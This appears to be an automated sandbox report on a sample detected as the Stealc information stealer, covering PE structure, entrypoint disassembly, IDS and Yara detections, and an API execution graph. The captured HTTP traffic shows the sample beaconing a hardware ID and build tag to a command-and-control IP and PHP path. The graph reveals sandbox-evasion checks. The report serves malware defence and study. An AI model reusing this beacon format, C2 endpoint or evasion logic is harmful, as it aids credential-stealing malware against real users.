                        SSDEEP:49152:R6jsOhFrYVBpNyTTTWI3IDtQW++pAwNbFW:R6jsmWCTTSdCW++pfdFW
                        TLSH:9FA533D296CB413ECA33CD39CF739706F4232625C548FB9A0694B37D6D6A2D48488B76
                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........b.}.............u^......uk......u_......{v.....fz./.....{f..............uZ......uh.....Rich....................PE..L...8n.g...

                        File Icon

                        Icon Hash:90cececece8e8eb0

                        Static PE Info

                        General

                        Entrypoint:0xb32000
                        Entrypoint Section:.taggant
                        Digitally signed:false
                        Imagebase:0x400000
                        Subsystem:windows gui
                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                        DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                        Time Stamp:0x671E6E38 [Sun Oct 27 16:45:44 2024 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:
                        OS Version Major:5
                        OS Version Minor:1
                        File Version Major:5
                        File Version Minor:1
                        Subsystem Version Major:5
                        Subsystem Version Minor:1
                        Import Hash:2eabe9054cad5152567f0699947a2c5b

                        Entrypoint Preview

                        Instruction
                        jmp 00007F3D907D9CCAh
                        setle byte ptr [eax]
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add cl, ch
                        add byte ptr [eax], ah
                        add byte ptr [eax], al
                        add byte ptr [edx+ecx], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        xor byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        or byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        and al, byte ptr [eax]
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        or dword ptr [eax+00000000h], eax
                        add byte ptr [eax], al
                        adc byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add eax, 0000000Ah
                        add byte ptr [eax], al

                        Rich Headers

                        Programming Language:
                        • [C++] VS2010 build 30319
                        • [ASM] VS2010 build 30319
                        • [ C ] VS2010 build 30319
                        • [ C ] VS2008 SP1 build 30729
                        • [IMP] VS2008 SP1 build 30729
                        • [LNK] VS2010 build 30319

                        Data Directories

                        NameVirtual AddressVirtual Size Is in Section
                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IMPORT0x2e90500x64.idata
                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x2e91f80x8.idata
                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                        Sections

                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                        0x10000x2e70000x67600b0330617675911947caa0217c0ea28eeunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .rsrc 0x2e80000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .idata 0x2e90000x10000x200049071433b9f7c843453337b0fd53002False0.1328125data0.8946074494647072IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        0x2ea0000x2a60000x200560b4de62245c31fcc67346b81f09c36unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        tnleqdlj0x5900000x1a10000x1a0e00dbad8512d7ddccff05a2740af37dc6f1False0.9949933236506746data7.955054294676287IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        afcdkohf0x7310000x10000x600b86de67d6582ceb9a646dbcb0b861560False0.5299479166666666data4.8176077298690325IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .taggant0x7320000x30000x220010cd804bfb7bdcd8d7d60c7d0a6289d7False0.06514246323529412DOS executable (COM)0.687786810131711IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                        Imports

                        DLLImport
                        kernel32.dlllstrcpy

                        Network Behavior

                        Suricata IDS Alerts

                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                        2024-10-30T21:55:11.459817+01002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.449730185.215.113.20680TCP

                        Network Port Distribution

                        TCP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        Oct 30, 2024 21:55:10.246751070 CET4973080192.168.2.4185.215.113.206
                        Oct 30, 2024 21:55:10.252840996 CET8049730185.215.113.206192.168.2.4
                        Oct 30, 2024 21:55:10.252952099 CET4973080192.168.2.4185.215.113.206
                        Oct 30, 2024 21:55:10.253108025 CET4973080192.168.2.4185.215.113.206
                        Oct 30, 2024 21:55:10.258924007 CET8049730185.215.113.206192.168.2.4
                        Oct 30, 2024 21:55:11.168297052 CET8049730185.215.113.206192.168.2.4
                        Oct 30, 2024 21:55:11.168361902 CET4973080192.168.2.4185.215.113.206
                        Oct 30, 2024 21:55:11.170546055 CET4973080192.168.2.4185.215.113.206
                        Oct 30, 2024 21:55:11.176999092 CET8049730185.215.113.206192.168.2.4
                        Oct 30, 2024 21:55:11.459585905 CET8049730185.215.113.206192.168.2.4
                        Oct 30, 2024 21:55:11.459816933 CET4973080192.168.2.4185.215.113.206
                        Oct 30, 2024 21:55:15.068137884 CET4973080192.168.2.4185.215.113.206

                        HTTP Request Dependency Graph

                        • 185.215.113.206

                        HTTP Packets

                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        0192.168.2.449730185.215.113.206804600C:\Users\user\Desktop\file.exe
                        TimestampBytes transferredDirectionData
                        Oct 30, 2024 21:55:10.253108025 CET90OUTGET / HTTP/1.1
                        Host: 185.215.113.206
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                        Oct 30, 2024 21:55:11.168297052 CET203INHTTP/1.1 200 OK
                        Date: Wed, 30 Oct 2024 20:55:11 GMT
                        Server: Apache/2.4.41 (Ubuntu)
                        Content-Length: 0
                        Keep-Alive: timeout=5, max=100
                        Connection: Keep-Alive
                        Content-Type: text/html; charset=UTF-8
                        Oct 30, 2024 21:55:11.170546055 CET413OUTPOST /6c4adf523b719729.php HTTP/1.1
                        Content-Type: multipart/form-data; boundary=----KJKEHIIJJECFHJKECFHD
                        Host: 185.215.113.206
                        Content-Length: 211
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                        Data Raw: 2d 2d 2d 2d 2d 2d 4b 4a 4b 45 48 49 49 4a 4a 45 43 46 48 4a 4b 45 43 46 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 30 36 46 43 41 34 37 37 30 42 43 34 31 35 38 31 33 35 32 33 36 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 45 48 49 49 4a 4a 45 43 46 48 4a 4b 45 43 46 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 45 48 49 49 4a 4a 45 43 46 48 4a 4b 45 43 46 48 44 2d 2d 0d 0a
                        Data Ascii: ------KJKEHIIJJECFHJKECFHDContent-Disposition: form-data; name="hwid"D06FCA4770BC4158135236------KJKEHIIJJECFHJKECFHDContent-Disposition: form-data; name="build"tale------KJKEHIIJJECFHJKECFHD--
                        Oct 30, 2024 21:55:11.459585905 CET210INHTTP/1.1 200 OK
                        Date: Wed, 30 Oct 2024 20:55:11 GMT
                        Server: Apache/2.4.41 (Ubuntu)
                        Content-Length: 8
                        Keep-Alive: timeout=5, max=99
                        Connection: Keep-Alive
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 59 6d 78 76 59 32 73 3d
                        Data Ascii: YmxvY2s=


                        Statistics

                        CPU Usage

                        Click to jump to process

                        Memory Usage

                        Click to jump to process

                        High Level Behavior Distribution

                        Click to dive into process behavior distribution

                        System Behavior

                        General

                        Target ID:0
                        Start time:16:55:07
                        Start date:30/10/2024
                        Path:C:\Users\user\Desktop\file.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\Desktop\file.exe"
                        Imagebase:0x20000
                        File size:2'146'304 bytes
                        MD5 hash:E7E67024404F23389E4052996E08923A
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1800359502.0000000000FBE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1756543501.0000000004E30000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                        Reputation:low
                        Has exited:true

                        Disassembly

                        Reset < >

                          Execution Graph

                          Execution Coverage:3.2%
                          Dynamic/Decrypted Code Coverage:0%
                          Signature Coverage:2.9%
                          Total number of Nodes:1327
                          Total number of Limit Nodes:24
                          execution_graph 36069 36c90 36114 222a0 36069->36114 36093 36d04 36094 3acc0 4 API calls 36093->36094 36095 36d0b 36094->36095 36096 3acc0 4 API calls 36095->36096 36097 36d12 36096->36097 36098 3acc0 4 API calls 36097->36098 36099 36d19 36098->36099 36100 3acc0 4 API calls 36099->36100 36101 36d20 36100->36101 36266 3abb0 36101->36266 36103 36d29 36104 36dac 36103->36104 36107 36d62 OpenEventA 36103->36107 36270 36bc0 GetSystemTime 36104->36270 36109 36d95 CloseHandle Sleep 36107->36109 36110 36d79 36107->36110 36112 36daa 36109->36112 36113 36d81 CreateEventA 36110->36113 36111 36db6 CloseHandle ExitProcess 36112->36103 36113->36104 36467 24610 36114->36467 36116 222b4 36117 24610 2 API calls 36116->36117 36118 222cd 36117->36118 36119 24610 2 API calls 36118->36119 36120 222e6 36119->36120 36121 24610 2 API calls 36120->36121 36122 222ff 36121->36122 36123 24610 2 API calls 36122->36123 36124 22318 36123->36124 36125 24610 2 API calls 36124->36125 36126 22331 36125->36126 36127 24610 2 API calls 36126->36127 36128 2234a 36127->36128 36129 24610 2 API calls 36128->36129 36130 22363 36129->36130 36131 24610 2 API calls 36130->36131 36132 2237c 36131->36132 36133 24610 2 API calls 36132->36133 36134 22395 36133->36134 36135 24610 2 API calls 36134->36135 36136 223ae 36135->36136 36137 24610 2 API calls 36136->36137 36138 223c7 36137->36138 36139 24610 2 API calls 36138->36139 36140 223e0 36139->36140 36141 24610 2 API calls 36140->36141 36142 223f9 36141->36142 36143 24610 2 API calls 36142->36143 36144 22412 36143->36144 36145 24610 2 API calls 36144->36145 36146 2242b 36145->36146 36147 24610 2 API calls 36146->36147 36148 22444 36147->36148 36149 24610 2 API calls 36148->36149 36150 2245d 36149->36150 36151 24610 2 API calls 36150->36151 36152 22476 36151->36152 36153 24610 2 API calls 36152->36153 36154 2248f 36153->36154 36155 24610 2 API calls 36154->36155 36156 224a8 36155->36156 36157 24610 2 API calls 36156->36157 36158 224c1 36157->36158 36159 24610 2 API calls 36158->36159 36160 224da 36159->36160 36161 24610 2 API calls 36160->36161 36162 224f3 36161->36162 36163 24610 2 API calls 36162->36163 36164 2250c 36163->36164 36165 24610 2 API calls 36164->36165 36166 22525 36165->36166 36167 24610 2 API calls 36166->36167 36168 2253e 36167->36168 36169 24610 2 API calls 36168->36169 36170 22557 36169->36170 36171 24610 2 API calls 36170->36171 36172 22570 36171->36172 36173 24610 2 API calls 36172->36173 36174 22589 36173->36174 36175 24610 2 API calls 36174->36175 36176 225a2 36175->36176 36177 24610 2 API calls 36176->36177 36178 225bb 36177->36178 36179 24610 2 API calls 36178->36179 36180 225d4 36179->36180 36181 24610 2 API calls 36180->36181 36182 225ed 36181->36182 36183 24610 2 API calls 36182->36183 36184 22606 36183->36184 36185 24610 2 API calls 36184->36185 36186 2261f 36185->36186 36187 24610 2 API calls 36186->36187 36188 22638 36187->36188 36189 24610 2 API calls 36188->36189 36190 22651 36189->36190 36191 24610 2 API calls 36190->36191 36192 2266a 36191->36192 36193 24610 2 API calls 36192->36193 36194 22683 36193->36194 36195 24610 2 API calls 36194->36195 36196 2269c 36195->36196 36197 24610 2 API calls 36196->36197 36198 226b5 36197->36198 36199 24610 2 API calls 36198->36199 36200 226ce 36199->36200 36201 39bb0 36200->36201 36472 39aa0 GetPEB 36201->36472 36203 39bb8 36204 39de3 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 36203->36204 36205 39bca 36203->36205 36206 39e44 GetProcAddress 36204->36206 36207 39e5d 36204->36207 36210 39bdc 21 API calls 36205->36210 36206->36207 36208 39e96 36207->36208 36209 39e66 GetProcAddress GetProcAddress 36207->36209 36211 39eb8 36208->36211 36212 39e9f GetProcAddress 36208->36212 36209->36208 36210->36204 36213 39ec1 GetProcAddress 36211->36213 36214 39ed9 36211->36214 36212->36211 36213->36214 36215 39ee2 GetProcAddress GetProcAddress 36214->36215 36216 36ca0 36214->36216 36215->36216 36217 3aa50 36216->36217 36218 3aa60 36217->36218 36219 36cad 36218->36219 36220 3aa8e lstrcpy 36218->36220 36221 211d0 36219->36221 36220->36219 36222 211e8 36221->36222 36223 21217 36222->36223 36224 2120f ExitProcess 36222->36224 36225 21160 GetSystemInfo 36223->36225 36226 21184 36225->36226 36227 2117c ExitProcess 36225->36227 36228 21110 GetCurrentProcess VirtualAllocExNuma 36226->36228 36229 21141 ExitProcess 36228->36229 36230 21149 36228->36230 36473 210a0 VirtualAlloc 36230->36473 36233 21220 36477 38b40 36233->36477 36236 21249 __aulldiv 36237 2129a 36236->36237 36238 21292 ExitProcess 36236->36238 36239 36a10 GetUserDefaultLangID 36237->36239 36240 36a73 36239->36240 36241 36a32 36239->36241 36247 21190 36240->36247 36241->36240 36242 36a43 ExitProcess 36241->36242 36243 36a61 ExitProcess 36241->36243 36244 36a57 ExitProcess 36241->36244 36245 36a6b ExitProcess 36241->36245 36246 36a4d ExitProcess 36241->36246 36248 37a70 3 API calls 36247->36248 36249 2119e 36248->36249 36250 211cc 36249->36250 36251 379e0 3 API calls 36249->36251 36254 379e0 GetProcessHeap RtlAllocateHeap GetUserNameA 36250->36254 36252 211b7 36251->36252 36252->36250 36253 211c4 ExitProcess 36252->36253 36255 36cd0 36254->36255 36256 37a70 GetProcessHeap RtlAllocateHeap GetComputerNameA 36255->36256 36257 36ce3 36256->36257 36258 3acc0 36257->36258 36479 3aa20 36258->36479 36260 3acd1 lstrlen 36261 3acf0 36260->36261 36262 3ad28 36261->36262 36264 3ad0a lstrcpy lstrcat 36261->36264 36480 3aab0 36262->36480 36264->36262 36265 3ad34 36265->36093 36267 3abcb 36266->36267 36268 3ac1b 36267->36268 36269 3ac09 lstrcpy 36267->36269 36268->36103 36269->36268 36484 36ac0 36270->36484 36272 36c2e 36273 36c38 sscanf 36272->36273 36513 3ab10 36273->36513 36275 36c4a SystemTimeToFileTime SystemTimeToFileTime 36276 36c80 36275->36276 36277 36c6e 36275->36277 36279 35d60 36276->36279 36277->36276 36278 36c78 ExitProcess 36277->36278 36280 35d6d 36279->36280 36281 3aa50 lstrcpy 36280->36281 36282 35d7e 36281->36282 36515 3ab30 lstrlen 36282->36515 36285 3ab30 2 API calls 36286 35db4 36285->36286 36287 3ab30 2 API calls 36286->36287 36288 35dc4 36287->36288 36519 36680 36288->36519 36291 3ab30 2 API calls 36292 35de3 36291->36292 36293 3ab30 2 API calls 36292->36293 36294 35df0 36293->36294 36295 3ab30 2 API calls 36294->36295 36296 35dfd 36295->36296 36297 3ab30 2 API calls 36296->36297 36298 35e49 36297->36298 36528 226f0 36298->36528 36306 35f13 36307 36680 lstrcpy 36306->36307 36308 35f25 36307->36308 36309 3aab0 lstrcpy 36308->36309 36310 35f42 36309->36310 36311 3acc0 4 API calls 36310->36311 36312 35f5a 36311->36312 36313 3abb0 lstrcpy 36312->36313 36314 35f66 36313->36314 36315 3acc0 4 API calls 36314->36315 36316 35f8a 36315->36316 36317 3abb0 lstrcpy 36316->36317 36318 35f96 36317->36318 36319 3acc0 4 API calls 36318->36319 36320 35fba 36319->36320 36321 3abb0 lstrcpy 36320->36321 36322 35fc6 36321->36322 36323 3aa50 lstrcpy 36322->36323 36324 35fee 36323->36324 37254 37690 GetWindowsDirectoryA 36324->37254 36327 3aab0 lstrcpy 36328 36008 36327->36328 37264 248d0 36328->37264 36330 3600e 37409 319f0 36330->37409 36332 36016 36333 3aa50 lstrcpy 36332->36333 36334 36039 36333->36334 36335 21590 lstrcpy 36334->36335 36336 3604d 36335->36336 37425 259b0 34 API calls codecvt 36336->37425 36338 36053 37426 31280 lstrlen lstrcpy 36338->37426 36340 3605e 36341 3aa50 lstrcpy 36340->36341 36342 36082 36341->36342 36343 21590 lstrcpy 36342->36343 36344 36096 36343->36344 37427 259b0 34 API calls codecvt 36344->37427 36346 3609c 37428 30fc0 StrCmpCA StrCmpCA StrCmpCA lstrlen lstrcpy 36346->37428 36348 360a7 36349 3aa50 lstrcpy 36348->36349 36350 360c9 36349->36350 36351 21590 lstrcpy 36350->36351 36352 360dd 36351->36352 37429 259b0 34 API calls codecvt 36352->37429 36354 360e3 37430 31170 StrCmpCA lstrlen lstrcpy 36354->37430 36356 360ee 36357 21590 lstrcpy 36356->36357 36358 36105 36357->36358 37431 31c60 115 API calls 36358->37431 36360 3610a 36361 3aa50 lstrcpy 36360->36361 36362 36126 36361->36362 37432 25000 7 API calls 36362->37432 36364 3612b 36365 21590 lstrcpy 36364->36365 36366 361ab 36365->36366 37433 308a0 286 API calls 36366->37433 36368 361b0 36369 3aa50 lstrcpy 36368->36369 36370 361d6 36369->36370 36371 21590 lstrcpy 36370->36371 36372 361ea 36371->36372 37434 259b0 34 API calls codecvt 36372->37434 36374 361f0 37435 313c0 StrCmpCA lstrlen lstrcpy 36374->37435 36376 361fb 36377 21590 lstrcpy 36376->36377 36378 3623b 36377->36378 37436 21ec0 59 API calls 36378->37436 36380 36240 36381 362e2 36380->36381 36382 36250 36380->36382 36384 3aab0 lstrcpy 36381->36384 36383 3aa50 lstrcpy 36382->36383 36385 36270 36383->36385 36386 362f5 36384->36386 36387 21590 lstrcpy 36385->36387 36388 21590 lstrcpy 36386->36388 36390 36284 36387->36390 36389 36309 36388->36389 37440 259b0 34 API calls codecvt 36389->37440 37437 259b0 34 API calls codecvt 36390->37437 36393 3630f 37441 337b0 31 API calls 36393->37441 36394 3628a 37438 31520 19 API calls codecvt 36394->37438 36397 362da 36400 3635b 36397->36400 36403 21590 lstrcpy 36397->36403 36398 36295 36399 21590 lstrcpy 36398->36399 36401 362d5 36399->36401 36402 36380 36400->36402 36405 21590 lstrcpy 36400->36405 37439 34010 67 API calls 36401->37439 36406 363a5 36402->36406 36409 21590 lstrcpy 36402->36409 36407 36337 36403->36407 36408 3637b 36405->36408 36411 363ca 36406->36411 36416 21590 lstrcpy 36406->36416 37442 34300 57 API calls 2 library calls 36407->37442 37444 349d0 88 API calls codecvt 36408->37444 36414 363a0 36409->36414 36412 363ef 36411->36412 36417 21590 lstrcpy 36411->36417 36418 36414 36412->36418 36423 21590 lstrcpy 36412->36423 37445 34e00 61 API calls codecvt 36414->37445 36415 3633c 36420 21590 lstrcpy 36415->36420 36421 363c5 36416->36421 36422 363ea 36417->36422 36425 36439 36418->36425 36431 21590 lstrcpy 36418->36431 36424 36356 36420->36424 37446 34fc0 65 API calls 36421->37446 37447 35190 63 API calls codecvt 36422->37447 36429 3640f 36423->36429 37443 35350 45 API calls 36424->37443 36427 36460 36425->36427 36433 21590 lstrcpy 36425->36433 36434 36503 36427->36434 36435 36470 36427->36435 37448 27770 108 API calls codecvt 36429->37448 36432 36434 36431->36432 37449 352a0 61 API calls codecvt 36432->37449 36438 36459 36433->36438 36439 3aab0 lstrcpy 36434->36439 36440 3aa50 lstrcpy 36435->36440 37450 391a0 46 API calls codecvt 36438->37450 36442 36516 36439->36442 36443 36491 36440->36443 36444 21590 lstrcpy 36442->36444 36445 21590 lstrcpy 36443->36445 36446 3652a 36444->36446 36447 364a5 36445->36447 37454 259b0 34 API calls codecvt 36446->37454 37451 259b0 34 API calls codecvt 36447->37451 36450 364ab 37452 31520 19 API calls codecvt 36450->37452 36451 36530 37455 337b0 31 API calls 36451->37455 36454 364b6 36456 21590 lstrcpy 36454->36456 36455 364fb 36457 3aab0 lstrcpy 36455->36457 36458 364f6 36456->36458 36459 3654c 36457->36459 37453 34010 67 API calls 36458->37453 36461 21590 lstrcpy 36459->36461 36462 36560 36461->36462 37456 259b0 34 API calls codecvt 36462->37456 36464 3656c 36466 36588 36464->36466 37457 368d0 9 API calls codecvt 36464->37457 36466->36111 36468 24621 RtlAllocateHeap 36467->36468 36471 24671 VirtualProtect 36468->36471 36471->36116 36472->36203 36475 210c2 codecvt 36473->36475 36474 210fd 36474->36233 36475->36474 36476 210e2 VirtualFree 36475->36476 36476->36474 36478 21233 GlobalMemoryStatusEx 36477->36478 36478->36236 36479->36260 36481 3aad2 36480->36481 36482 3aafc 36481->36482 36483 3aaea lstrcpy 36481->36483 36482->36265 36483->36482 36485 3aa50 lstrcpy 36484->36485 36486 36ad3 36485->36486 36487 3acc0 4 API calls 36486->36487 36488 36ae5 36487->36488 36489 3abb0 lstrcpy 36488->36489 36490 36aee 36489->36490 36491 3acc0 4 API calls 36490->36491 36492 36b07 36491->36492 36493 3abb0 lstrcpy 36492->36493 36494 36b10 36493->36494 36495 3acc0 4 API calls 36494->36495 36496 36b2a 36495->36496 36497 3abb0 lstrcpy 36496->36497 36498 36b33 36497->36498 36499 3acc0 4 API calls 36498->36499 36500 36b4c 36499->36500 36501 3abb0 lstrcpy 36500->36501 36502 36b55 36501->36502 36503 3acc0 4 API calls 36502->36503 36504 36b6f 36503->36504 36505 3abb0 lstrcpy 36504->36505 36506 36b78 36505->36506 36507 3acc0 4 API calls 36506->36507 36508 36b93 36507->36508 36509 3abb0 lstrcpy 36508->36509 36510 36b9c 36509->36510 36511 3aab0 lstrcpy 36510->36511 36512 36bb0 36511->36512 36512->36272 36514 3ab22 36513->36514 36514->36275 36516 3ab4f 36515->36516 36517 35da4 36516->36517 36518 3ab8b lstrcpy 36516->36518 36517->36285 36518->36517 36520 3abb0 lstrcpy 36519->36520 36521 36693 36520->36521 36522 3abb0 lstrcpy 36521->36522 36523 366a5 36522->36523 36524 3abb0 lstrcpy 36523->36524 36525 366b7 36524->36525 36526 3abb0 lstrcpy 36525->36526 36527 35dd6 36526->36527 36527->36291 36529 24610 2 API calls 36528->36529 36530 22704 36529->36530 36531 24610 2 API calls 36530->36531 36532 22727 36531->36532 36533 24610 2 API calls 36532->36533 36534 22740 36533->36534 36535 24610 2 API calls 36534->36535 36536 22759 36535->36536 36537 24610 2 API calls 36536->36537 36538 22786 36537->36538 36539 24610 2 API calls 36538->36539 36540 2279f 36539->36540 36541 24610 2 API calls 36540->36541 36542 227b8 36541->36542 36543 24610 2 API calls 36542->36543 36544 227e5 36543->36544 36545 24610 2 API calls 36544->36545 36546 227fe 36545->36546 36547 24610 2 API calls 36546->36547 36548 22817 36547->36548 36549 24610 2 API calls 36548->36549 36550 22830 36549->36550 36551 24610 2 API calls 36550->36551 36552 22849 36551->36552 36553 24610 2 API calls 36552->36553 36554 22862 36553->36554 36555 24610 2 API calls 36554->36555 36556 2287b 36555->36556 36557 24610 2 API calls 36556->36557 36558 22894 36557->36558 36559 24610 2 API calls 36558->36559 36560 228ad 36559->36560 36561 24610 2 API calls 36560->36561 36562 228c6 36561->36562 36563 24610 2 API calls 36562->36563 36564 228df 36563->36564 36565 24610 2 API calls 36564->36565 36566 228f8 36565->36566 36567 24610 2 API calls 36566->36567 36568 22911 36567->36568 36569 24610 2 API calls 36568->36569 36570 2292a 36569->36570 36571 24610 2 API calls 36570->36571 36572 22943 36571->36572 36573 24610 2 API calls 36572->36573 36574 2295c 36573->36574 36575 24610 2 API calls 36574->36575 36576 22975 36575->36576 36577 24610 2 API calls 36576->36577 36578 2298e 36577->36578 36579 24610 2 API calls 36578->36579 36580 229a7 36579->36580 36581 24610 2 API calls 36580->36581 36582 229c0 36581->36582 36583 24610 2 API calls 36582->36583 36584 229d9 36583->36584 36585 24610 2 API calls 36584->36585 36586 229f2 36585->36586 36587 24610 2 API calls 36586->36587 36588 22a0b 36587->36588 36589 24610 2 API calls 36588->36589 36590 22a24 36589->36590 36591 24610 2 API calls 36590->36591 36592 22a3d 36591->36592 36593 24610 2 API calls 36592->36593 36594 22a56 36593->36594 36595 24610 2 API calls 36594->36595 36596 22a6f 36595->36596 36597 24610 2 API calls 36596->36597 36598 22a88 36597->36598 36599 24610 2 API calls 36598->36599 36600 22aa1 36599->36600 36601 24610 2 API calls 36600->36601 36602 22aba 36601->36602 36603 24610 2 API calls 36602->36603 36604 22ad3 36603->36604 36605 24610 2 API calls 36604->36605 36606 22aec 36605->36606 36607 24610 2 API calls 36606->36607 36608 22b05 36607->36608 36609 24610 2 API calls 36608->36609 36610 22b1e 36609->36610 36611 24610 2 API calls 36610->36611 36612 22b37 36611->36612 36613 24610 2 API calls 36612->36613 36614 22b50 36613->36614 36615 24610 2 API calls 36614->36615 36616 22b69 36615->36616 36617 24610 2 API calls 36616->36617 36618 22b82 36617->36618 36619 24610 2 API calls 36618->36619 36620 22b9b 36619->36620 36621 24610 2 API calls 36620->36621 36622 22bb4 36621->36622 36623 24610 2 API calls 36622->36623 36624 22bcd 36623->36624 36625 24610 2 API calls 36624->36625 36626 22be6 36625->36626 36627 24610 2 API calls 36626->36627 36628 22bff 36627->36628 36629 24610 2 API calls 36628->36629 36630 22c18 36629->36630 36631 24610 2 API calls 36630->36631 36632 22c31 36631->36632 36633 24610 2 API calls 36632->36633 36634 22c4a 36633->36634 36635 24610 2 API calls 36634->36635 36636 22c63 36635->36636 36637 24610 2 API calls 36636->36637 36638 22c7c 36637->36638 36639 24610 2 API calls 36638->36639 36640 22c95 36639->36640 36641 24610 2 API calls 36640->36641 36642 22cae 36641->36642 36643 24610 2 API calls 36642->36643 36644 22cc7 36643->36644 36645 24610 2 API calls 36644->36645 